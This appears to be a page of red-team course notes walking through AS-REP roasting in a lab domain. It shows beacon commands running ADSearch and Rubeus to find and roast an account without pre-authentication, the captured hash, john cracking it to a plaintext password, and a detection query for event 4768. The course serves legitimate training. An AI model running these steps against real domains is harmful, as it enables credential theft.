ASREP Roasting

If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password. This configuration is enabled on the User Object and is often seen on accounts that are associated with Linux systems.

As with kerberoasting, we don't want to asreproast every account in the domain.

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

[*] TOTAL NUMBER OF SEARCH RESULTS: 1
	[+] cn                : Squid Proxy
	[+] distinguishedname : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io
	[+] samaccountname    : squid_svc

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap

[*] SamAccountName         : squid_svc
[*] DistinguishedName      : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Building AS-REQ (w/o preauth) for: 'dev.cyberbotic.io\squid_svc'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

      $krb5asrep$squid_svc@dev.cyberbotic.io:BEDE491E0C9B3E932F9B4DF274AB059B$0947A85824870A9EA0B2C832B30D8B99BDA99F9451E9EB14AA0D9566674B32A10BE4954E6FB15DED54462D4AAAAE28DFB08C83EF0608DA6EEB9A08DBC79C06099D2B366BA5402A0ED60545B92B17882557CBB0FC700309751C51AF33F25A3103FA67DAAD9AD2154FE4171FBEFBE725AA1311CE50EFB8B87FF1BBCF5E97C496E08BA3CC4CA4F59820C4C27251686658C9F7EE52B43ED5A969A02273510AC7CCFB5DFE61E7A9D72E10B81E7B3ACBFDA0F3F058791E9A87D990871961D3BD9AEB40B9D0A1260094B17DCB8114DDBB19B5C2031F2906E527F96F1AFA62D907570E39E047659532F1FA043371DDF8D7FB9A5E5369A889A7BC

Use --format=krb5asrep --wordlist=wordlist squid_svc for john or -a 0 -m 18200 squid_svc wordlist for hashcat.

$ john --format=krb5asrep --wordlist=wordlist squid_svc
Passw0rd!        ($krb5asrep$squid_svc@dev.cyberbotic.io)

OPSEC ASREPRoasting with will generate a 4768 event with RC4 encryption and a preauth type of 0. \

event.code: 4768 and winlog.event_data.PreAuthType: 0 and winlog.event_data.TicketEncryptionType: 0x17

PreviousKerberoasting NextUnconstrained Delegation

Last updated 1 year ago

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname [*] TOTAL NUMBER OF SEARCH RESULTS: 1 [+] cn : Squid Proxy [+] distinguishedname : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io [+] samaccountname : squid_svc

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap [*] SamAccountName : squid_svc [*] DistinguishedName : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io [*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10) [*] Building AS-REQ (w/o preauth) for: 'dev.cyberbotic.io\squid_svc' [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$squid_svc@dev.cyberbotic.io:BEDE491E0C9B3E932F9B4DF274AB059B$0947A85824870A9EA0B2C832B30D8B99BDA99F9451E9EB14AA0D9566674B32A10BE4954E6FB15DED54462D4AAAAE28DFB08C83EF0608DA6EEB9A08DBC79C06099D2B366BA5402A0ED60545B92B17882557CBB0FC700309751C51AF33F25A3103FA67DAAD9AD2154FE4171FBEFBE725AA1311CE50EFB8B87FF1BBCF5E97C496E08BA3CC4CA4F59820C4C27251686658C9F7EE52B43ED5A969A02273510AC7CCFB5DFE61E7A9D72E10B81E7B3ACBFDA0F3F058791E9A87D990871961D3BD9AEB40B9D0A1260094B17DCB8114DDBB19B5C2031F2906E527F96F1AFA62D907570E39E047659532F1FA043371DDF8D7FB9A5E5369A889A7BC